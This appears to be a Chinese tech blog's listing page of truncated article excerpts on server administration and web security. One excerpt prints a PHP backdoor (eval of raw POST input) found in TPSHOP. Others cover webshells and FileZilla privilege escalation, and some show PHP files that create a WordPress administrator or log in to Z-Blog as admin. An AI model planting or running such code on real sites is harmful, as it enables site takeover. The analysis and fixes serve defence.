技术文章

【注意】此脚本搭建稳定请使用下面的脚本搭建，如需测试版本请查看更新日志更新日志：2018年10月25日18:37:41：发布官方最新dev测试版本脚本，优点可随官方更新，缺点脚本问题。【此脚本为测试版本，如遇到问题请及时留言】yum install wget -y && wget -N --no-check-certificate https://raw.githubusercontent.com/marisn2017/ss-panel-v3-mod_Uim/maste

方法一后台密码忘记了怎么办？1.如果你已经在后台配置了，邮件发送功能且邮箱是你的真实邮箱，可以到前台登录页找回密码；2.如果你是后台管理员，你可以使用 sp_password()方法生成一下新的密码；你只要在任何一个前台可以访问控制器里,如application/Portal/Controller/IndexController.class.php<?phpnamespace Portal\Controller;use Common\Controller\Homebas

影响版本：TPSHOP v2.0.0后门文件：eval-stdin.php 内容：<?php  eval('?>' . file_get_contents('php://input')); ?>分析：使用file_get_contents('php://input'))接收POST请求的原始数据流eval函数来执行。我们把代码复制下来，本地调试如下，惊喜不，喜欢不，兴奋不

一、什么是webshellwebshell简介webshell，顾名思义：web指的是在web服务器上，而shell是用脚本语言编写的脚本程序，webshell就是就是web的一个管理工具，可以对web服务器进行操作的权限，也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途，但是由于webshell的功能比较强大，可以上传下载文件，查看数据库，甚至可以调用一些服务器上系统的相关命令（比如创建用户，修改删除文件之类的），通常被黑客利用，黑客通过一些上传方式

WEB安全 提权篇 FileZilla 提权1.简介FileZilla 是一个ftp服务器， 假如配置不严的，读取xml密码 可以执行一些简答的命令默认安装目录C:\Program Files\FileZilla Server\2.提权FileZilla Server Interface.xml <FileZillaServer>     <Settings>     

今天重启电脑后 应用商店出现代码: 0x80131500想了下因为电脑上安装了网银，网银工具重设过IE浏览器。把SSL 3.0开启即可解决。请打开 IE 浏览器，点击设置，打开 Internet 选项点击高级，并勾选 “使用SSL 3.0”、”使用 TLS 1.0“、”使用 TLS 1.1“、”使用 TLS 1.2“，应用后重新打开应用商店即可解决，查看能否解决问题。顺便说下，有时候我们需要加速工具提示无法下载的时候可是在电脑设置里 搜索 区域设

Windows删除电脑文件会先经过回收站，目的是便于我们因意外操作而恢复电脑数据文件。只要你不是通过shift+delete组合键删除文件，也没有在回收站属性里设置不将文件移到回收站中。移除文件后立即将其删除，那么你删除的文件就会在回收站里存放很久直至手动将其清空。怎样让Windows电脑自动定期清空回收站呢微软的Windows 10操作系统附带了一项名为Storage Sense的新功能 ; 我们可以将其配置为定期自动删除回收站内容和其他临时文件。在windows 10电脑上，我们先打开Win

Modown是一款不错的主题，但是最近不少网站被黑。看了下该主题存在一个非常低级的漏洞。投稿上传图片没用做过滤，可以通过拦截修改上传文件格式。修复方法上传限制格式，并做文件验证。同时吧/wp-content/uploads上传目录禁止执行。

首先本地电脑创建一个PHP文件 如：wp_insert_user.php文件内容如下：<?php include 'wp-config.php'; $user_login = 'test'; $user_pass = '123456'; $user_email = '12345678@not_exists.com'; $role = 'administr

方法一此方法为了管理员用户忘记密码，或者登录页面无法打开的情况临时解决方法。新建一个php文件放你网站根目录，打开就可以自动登录管理员账号。<?php require 'zb_system/function/c_system_base.php'; $uid = 1;  //这里为管理员用户ID； SetLoginCookie($zbp->GetMemberByID($uid),time()+86400); header

简介zfaka：免费、安全、稳定、高效的发卡系统Github: https://github.com/zlkbdotnet/zfaka操作上传接口文件下载文件github: https://github.com/anhao/zfaka-epay-sdk上传文件⑴ 把Pay下面的 三个文件夹 alpayalipay , alpaywxpay , alpayqqpay 上传到zfaka程序的application\lib

upload-labs是一个使用php语言编写的，专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关，每一关都包含着不同上传方式。蓝奏云下载：https://www.lanzous.com/i39y5bc百度云下载：https://pan.baidu.com/s/1Lisree3jMJNpPLBHojDQKw0x01 Screenshot1.1 主界面1.2 每一关1.3 查看代码0x02 Install2.1 环境要求若要自己亲自搭建环境